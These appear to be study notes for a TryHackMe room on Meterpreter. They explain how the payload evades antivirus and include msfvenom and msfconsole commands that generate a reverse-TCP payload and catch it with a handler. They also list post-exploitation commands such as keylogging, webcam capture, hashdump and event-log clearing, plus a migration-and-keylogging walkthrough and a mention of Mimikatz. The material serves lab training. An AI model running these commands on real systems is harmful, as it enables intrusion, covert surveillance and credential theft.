Meterpreter

https://tryhackme.com/r/room/meterpreter

Meterpreter is a Metasploit payload that supports the penetration testing process with many valuable components. Meterpreter will run on the target system and act as an agent within a command and control architecture.

Meterpreter runs on the target without being installed as a program: the agent is injected into memory (RAM) and, once the session is up, does not need to write itself to disk. That is why Meterpreter is harder for signature-based antivirus to spot: on the target it appears only as code inside a running process, not as a file on disk. This reduces exposure rather than eliminating it. The stager that delivers the agent (for example an executable generated with msfvenom) can still sit on disk and be caught, and modern EDR products scan process memory and flag behaviours such as process injection and migration. Meterpreter also encrypts its traffic to the host where Metasploit runs: the session protocol (TLV packets) is encrypted once the session is established, and the HTTPS transports wrap it in TLS on top of that.

Use the following command to display meterpreter payloads:
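The listing command, and the natural next step of generating one of the listed payloads and catching it, as an added example that is not part of the original notes. The LHOST/LPORT values and the output file name are placeholders; lines starting with # are annotations, not commands.

```console
# List every payload whose name contains "meterpreter"
msfvenom --list payloads | grep meterpreter

# Narrow it down, e.g. to staged 64-bit Windows reverse-TCP variants
msfvenom --list payloads | grep 'windows/x64/meterpreter/reverse'

# Generate a staged payload (placeholder LHOST/LPORT, placeholder file name)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe

# Start the matching listener; the handler payload must be the same one that was generated
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.14.5; set LPORT 4444; run"
```

Note the naming convention in the listing: a slash before the transport (meterpreter/reverse_tcp) is a staged payload, which sends a small stager that then downloads the Meterpreter DLL, while an underscore (meterpreter_reverse_tcp) is a stageless payload that carries the whole agent. The handler has to be set to the same variant, or the connection comes in but no session is created.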

Meterpreter Commands

Core commands:

  • ?: Help Menu

  • background: Backgrounds current session

  • exit: Terminates session

  • guid: Get session GUID

  • info: Display post module information

  • irb: Opens interactive ruby shell

  • load: Loads one or more meterpreter extensions

  • migrate: Migrates meterpreter process to another process

  • run: Executes a meterpreter script or post module

  • sessions: Quickly switch to another session

File and networking commands:

  • search: Searches for files

  • upload: Uploads file or directory

  • download: Downloads a file or directory

  • netstat: Displays the network connections

  • portfwd: Forwards a local port to a remote service

  • route: Views and modifies the routing table

System commands:

  • clearev: Clears the event logs

  • execute: Executes a command

  • getpid: Shows current process identifier

  • kill: Terminates process

  • reboot: Reboots remote computer

  • shell: Drops into system command shell

  • sysinfo: Gets information about remote system

Other commands:

  • idletime: Returns the number of seconds remote user is idle

  • keyscan_dump: Dumps the keystroke buffer

  • keyscan_start: Starts capturing keystrokes

  • keyscan_stop: Stops capturing keystrokes

  • screenshare: Allows you to watch the remote user's desktop

  • record_mic: Records audio from default microphone

  • webcam_chat: Starts video chat

  • webcam_stream: Plays a video stream from the specified webcam

  • getsystem: Attempts to elevate privileges to SYSTEM

  • hashdump: Dumps the contents of the SAM database (requires SYSTEM privileges)

Post Exploitation

The migrate command moves Meterpreter into another process on the target to aid in continued interaction. This is helpful for creating a more stable session, since the process the session started in (a browser tab or an exploited service, for example) may crash or be closed by the user. It can also be used for keylogging: keystrokes typed into a process such as winword.exe, notepad.exe or a browser can be captured after migrating into it, and migrating into explorer.exe captures the user's whole desktop session. Two caveats apply: you need the right to open the target process (as a normal user only your own processes, as SYSTEM almost any), and the session takes on the privileges of the process it lands in, so migrating from a SYSTEM process into a user's process drops privileges.

The following would be a sample command execution involving migration:
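A migration sequence with a keystroke capture afterwards, as an added example that is not part of the original notes. The process name explorer.exe is chosen for illustration; lines starting with # are annotations, not commands typed at the prompt.

```console
# Where are we now, and as whom? You can only open processes your token allows.
meterpreter > getpid
meterpreter > getuid

# List processes; pick a long-lived one owned by the same user (or anything, if SYSTEM)
meterpreter > ps

# Migrate by name (migrate <PID> or migrate -P <PID> also works)
meterpreter > migrate -N explorer.exe

# Confirm the PID changed and the user context is what you expect
meterpreter > getpid
meterpreter > getuid

# From inside explorer.exe the keystroke buffer covers the user's desktop session
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

# Alternative: let a post module spawn a fresh notepad.exe and migrate into it
meterpreter > run post/windows/manage/migrate
```

Pick the target process by architecture as well as by owner: Meterpreter handles 32-to-64-bit migration, but post modules and extensions such as kiwi behave best when the session architecture matches the operating system, so on a 64-bit host prefer a 64-bit process.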

Post exploitation using meterpreter can be split into the following categories:

  • Gathering further intelligence about the target system

  • Searching for files, credentials, interfaces, and further information

  • Privilege escalation

  • Lateral movement

The following command can be used to load Mimikatz, a great tool for post exploitation and privilege escalation on Windows machines. Older Metasploit versions shipped it as a separate extension named mimikatz; current versions provide it as the kiwi extension, which needs a SYSTEM-level session to read credentials from LSASS:
